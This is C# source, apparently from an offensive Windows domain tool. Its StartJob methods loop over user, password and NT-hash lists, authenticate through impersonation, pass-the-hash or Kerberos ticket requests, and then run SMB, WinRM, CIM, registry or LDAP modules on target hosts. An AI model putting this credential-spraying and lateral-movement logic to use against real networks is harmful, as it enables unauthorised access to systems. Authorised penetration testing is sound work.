public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string[] computernames, string domainController, string module, string moduleargument, string path, string destination, List <string> flags, string protocol)
{
var secrets = hashes != null ? hashes : passwords;
if (hashes != null)
{
foreach (string user in users)
{
foreach (string password in secrets)
{
Console.WriteLine("------------------");
Console.WriteLine(string.Format("[*] User: {0}", user));
Console.WriteLine(string.Format("[*] domain: {0}", domain));
Console.WriteLine(string.Format("[*] secret: {0}", password));
Console.WriteLine();
SetThreadToken(user, domain, password);
if (protocol.ToLower() == "smb")
{
Scan.SMB(computernames, module);
}
else if (protocol.ToLower() == "winrm")
{
Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
}
else if (protocol.ToLower() == "reg32")
{
Scan.REG32(computernames, module);
}
else if (protocol.ToLower() == "domain")
{
Scan.LDAP(module, domain, domainController);
}
}
}
}
else
{
foreach (string user in users)
{
foreach (string password in secrets)
{
Console.WriteLine("------------------");
Console.WriteLine(string.Format("[*] User: {0}", user));
Console.WriteLine(string.Format("[*] domain: {0}", domain));
Console.WriteLine(string.Format("[*] secret: {0}", password));
Console.WriteLine();
using (new Impersonator.Impersonation(domain, user, password))
{
if (protocol.ToLower() == "smb")
{
Scan.SMB(computernames, module);
}
else if (protocol.ToLower() == "winrm")
{
Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
}
else if (protocol.ToLower() == "cim")
{
foreach (string computername in computernames)
{
CimSession cimSession;
cimSession = Cim.newSession(computername, domain, user, password, flags.Contains("impersonate"));
Scan.CIM(cimSession, module);
}
}
else if (protocol.ToLower() == "reg32")
{
Scan.REG32(computernames, module);
}
else if (protocol.ToLower() == "domain")
{
Scan.LDAP(module, domain, domainController);
}
}
}
}
}
}
public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags, string protocol)
{
AToken.MakeToken("Fake", "Fake", "Fake");
Console.WriteLine("------------------");
if (String.IsNullOrEmpty(ticket))
{
var secrets = hashes.Length > 0 ? hashes : passwords;
foreach (string user in users)
{
foreach (string secret in secrets)
{
string hash;
if (passwords.Length > 0)
{
string salt = String.Format("{0}{1}", domain.ToUpper(), user);
hash = Crypto.KerberosPasswordHash(encType, secret, salt);
}
else
{
hash = secret;
}
Console.WriteLine(string.Format("[*] User: {0}", user));
Console.WriteLine(string.Format("[*] Domain: {0}", domain));
Console.WriteLine(string.Format("[*] Secret: {0}", secret));
string ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
if (ticketoutput.Contains("[+] Ticket successfully imported!"))
{
Console.WriteLine("[+] Ticket successfully imported!");
}
else
{
Console.WriteLine("[-] Could not request TGT");
continue;
}
if (protocol.ToLower() == "smb")
{
Scan.SMB(computernames, module);
}
else if (protocol.ToLower() == "winrm")
{
Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
}
else if (protocol.ToLower() == "reg32")
{
Scan.REG32(computernames, module);
}
else if (protocol.ToLower() == "ldap")
{
Scan.LDAP(module, domain, dc);
}
}
}
}
else
{
Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
string ticketoutput = SecurityContext.ImportTicket(ticket);
if (ticketoutput.Contains("[+] Ticket successfully imported!"))
{
Console.WriteLine("[+] TGT imported successfully!");
}
else
{
Console.WriteLine("[-] Could not import TGT");
return;
}
if (protocol.ToLower() == "smb")
{
Scan.SMB(computernames, module);
}
else if (protocol.ToLower() == "winrm")
{
Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
}
else if (protocol.ToLower() == "reg32")
{
Scan.REG32(computernames, module);
}
else if (protocol.ToLower() == "ldap")
{
Scan.LDAP(module, domain, dc);
}
}
AToken.RevertFromToken();
}
public static void StartJob <T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags, string protocol)
{
string[] passwords;
if (typeof(T) == typeof(NTHash))
{
passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Nthash").GetValue(secrets, null);
foreach (string user in users)
{
foreach (string password in passwords)
{
Console.WriteLine("------------------");
Console.WriteLine(string.Format("[*] User: {0}", user));
Console.WriteLine(string.Format("[*] domain: {0}", domain));
Console.WriteLine(string.Format("[*] secret: {0}", password));
Console.WriteLine();
SetThreadToken(user, domain, password);
if (protocol.ToLower() == "smb")
{
Scan.SMB(computernames, module);
}
else if (protocol.ToLower() == "winrm")
{
Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
}
else if (protocol.ToLower() == "reg32")
{
Scan.REG32(computernames, module);
}
}
}
}
else if (typeof(T) == typeof(ClearText))
{
passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Cleartext").GetValue(secrets, null);
foreach (string user in users)
{
foreach (string password in passwords)
{
Console.WriteLine("------------------");
Console.WriteLine(string.Format("[*] User: {0}", user));
Console.WriteLine(string.Format("[*] domain: {0}", domain));
Console.WriteLine(string.Format("[*] secret: {0}", password));
Console.WriteLine();
using (new Impersonator.Impersonation(domain, user, password))
{
if (protocol.ToLower() == "smb")
{
Scan.SMB(computernames, module);
}
else if (protocol.ToLower() == "winrm")
{
Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
}
else if (protocol.ToLower() == "cim")
{
foreach (string computername in computernames)
{
CimSession cimSession;
cimSession = Cim.newSession(computername, domain, user, password, flags.Contains("impersonate"));
Scan.CIM(cimSession, module);
}
}
else if (protocol.ToLower() == "reg32")
{
Scan.REG32(computernames, module);
}
}
}
}
}
}
